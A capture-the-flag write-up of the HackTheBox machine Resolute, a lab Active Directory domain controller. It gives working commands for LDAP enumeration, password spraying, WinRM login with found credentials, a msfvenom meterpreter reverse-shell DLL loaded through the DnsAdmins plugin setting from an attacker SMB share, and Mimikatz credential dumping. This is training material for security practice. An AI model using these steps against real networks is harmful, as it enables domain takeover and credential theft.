HTB Resolute Card

Resolute is a medium-rated HackTheBox machine, which involved finding the default password used for new corporate accounts using LDAP queries, password spraying to find a user that had not changed the default password, finding a PowerShell transcript file with plaintext credentials for another user, and EoP by taking advantage of the DnsAdmins group membership the user had, by reconfiguring the DNS service so that it loaded a malicious DLL as soon as it started.

Reconnaissance

Port Scan

Let’s start with a nmap port scan for all TCP ports with service/version detection and default scripts.

nmap -sV -sC -vvv 10.10.10.169

PORT      STATE SERVICE      VERSION
53/tcp    open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-04-23 12:34:02Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC

LDAP Enumeration

Since anonymous bind is allowed, we can retrieve a list with corporate users’ usernames with the following LDAP query and some bash fu.

ldapsearch -LLL -x -h 10.10.10.169 -b 'dc=megabank,dc=local' '(objectClass=user)' \
| grep sAMAccountName | tail -n +5 | cut -d' ' -f2 | tee users.txt

ryan
marko
sunita
abigail
marcus
sally
fred
angela
felicia
[...]

Then with the following LDAP query we can also ask the DC to return the Description field for all users. User marko had a note, with what it may be the default password set for new corporate accounts.

ldapsearch -LLL -x -h 10.10.10.169 -b 'dc=megabank,dc=local' \
'(objectClass=user)' userPrincipalName sAMAccountName description

...[snip]...

dn: CN=Marko Novak,OU=Employees,OU=MegaBank Users,DC=megabank,DC=local
description: Account created. Password set to Welcome123!
sAMAccountName: marko
userPrincipalName: [email protected]

...[snip]...

Credentials found:

  • Username: marko
  • Password: Welcome123!

Unfortunately the credentials were probably changed by the user. Using them to attempt to connect to the box via SMB or WinRM returns an authentication error.

SMB Password Spraying

We can assume Welcome123! is the default password assigned to every new user in the megabank.local domain, so we can use crackmapexec to perform password spraying with password Welcome123!, to discovery any potential user that still hasn’t changed the default password.

crackmapexec smb 10.10.10.169 -u users.txt -p 'Welcome123!'

...[snip]...
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK\annika:Welcome123! STATUS_LOGON_FAILURE
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK\per:Welcome123! STATUS_LOGON_FAILURE
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK\claude:Welcome123! STATUS_LOGON_FAILURE
SMB         10.10.10.169    445    RESOLUTE         [+] MEGABANK\melanie:Welcome123!

User melanie is still using the default password. We can use the creds and login into the box via WinRM.

Initial Access 

./evil-winrm.rb -i 10.10.10.169 -u 'melanie' -p 'Welcome123!'

...[snip]...

*Evil-WinRM* PS C:\Users\melanie\Documents>

As user melanie we can read the user flag.

*Evil-WinRM* PS C:\Users\melanie\Desktop> type user.txt
0c3be45fcfe249796cc[...]

In C:\ there’s a non-default hidden directory called PSTranscripts

*Evil-WinRM* PS C:\> gci -Force


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--hs-        4/21/2020   6:56 AM                $RECYCLE.BIN
d--hsl        9/25/2019  10:17 AM                Documents and Settings
d-----        9/25/2019   6:19 AM                PerfLogs
d-r---        9/25/2019  12:39 PM                Program Files
d-----       11/20/2016   6:36 PM                Program Files (x86)
d--h--        9/25/2019  10:48 AM                ProgramData
d--h--        12/3/2019   6:32 AM                PSTranscripts

...[snip]...

Inside the PSTranscripts folder, there is another hidden folder which contains a .txt file.

*Evil-WinRM* PS C:\PSTranscripts\20191203> gci -Force


    Directory: C:\PSTranscripts\20191203


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-arh--        12/3/2019   6:45 AM           3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt

The file contains the credentials for user ryan, which passed his plaintext credentials with the net use command.


...[snip]...

**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!

...[snip]...

Login as ryan using Evil-WinRM

./evil-winrm.rb -i 10.10.10.169 -u 'ryan' -p 'Serv3r4Admin4cc123!'

*Evil-WinRM* PS C:\Users\ryan\Documents>

User ryan is a member of the DNSAdmins group.

*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /groups | findstr Admin

MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-...

Privilege Escalation to SYSTEM

Since user ryan is a member of DnsAdmins group, we can escalate our privileges by reconfiguring and restarting the DNS service. By importing a custom DLL with meterpreter shellcode, as part of the new configuration, we can get a shell as NT AUTHORITY\SYSTEM as soon as the service is restarted.

First, we generate a meterpreter reverse shell DLL for 64-bit Windows OS, using msfvenom, and host it using impacket’s smbserver.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.15.138 LPORT=7001 -f dll > evil.dll

smbserver.py -smb2support SHARED ~/HTB/Resolute/www/evil.dll

Then we use dnscmd utility, to import the DLL as plugin for the DNS service.

dnscmd.exe /config /serverlevelplugindll \\10.10.15.138\SHARED\evil.dll


Registry property serverlevelplugindll successfully reset.
Command completed successfully.

Finally, after starting a netcat listener to catch the reverse shell connection, we can restart the DNS service.

sc.exe stop dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

sc.exe start dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 3500
        FLAGS

As expected, we got a shell as NT AUTHORITY\SYSTEM.

nc -lnvp 7001
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::7001
Ncat: Listening on 0.0.0.0:7001
Ncat: Connection from 10.10.10.169.
Ncat: Connection from 10.10.10.169:59914.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

Root flag

C:\Users\Administrator\Desktop>type root.txt
type root.txt
e1d94876a506850d0c20e[...]

Bonus - Dumping LSASS

Finally with a shell as local admin, we can run Mimikatz via SMB and dump LSASS process memory, which contained Administrator’s logon password.

C:\Users\Administrator\Music>\\10.10.15.138\SHARED\mimikatz.exe
\\10.10.15.138\SHARED\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #18362 Mar  8 2020 13:32:41
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 346648 (00000000:00054a18)
Session           : Interactive from 1
User Name         : Administrator
Domain            : MEGABANK
Logon Server      : RESOLUTE
Logon Time        : 4/21/2020 4:32:22 AM
SID               : S-1-5-21-1392959593-3013219662-3596683436-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : MEGABANK
         * NTLM     : fb3b106896cdaa8a08072775fbd9afe9
         * SHA1     : 03006b77aacca0a1e25f4134c6e2f1ef13a82a19
         * DPAPI    : b0ea673ad8371cc2873a75a4124365cf

...[snip]...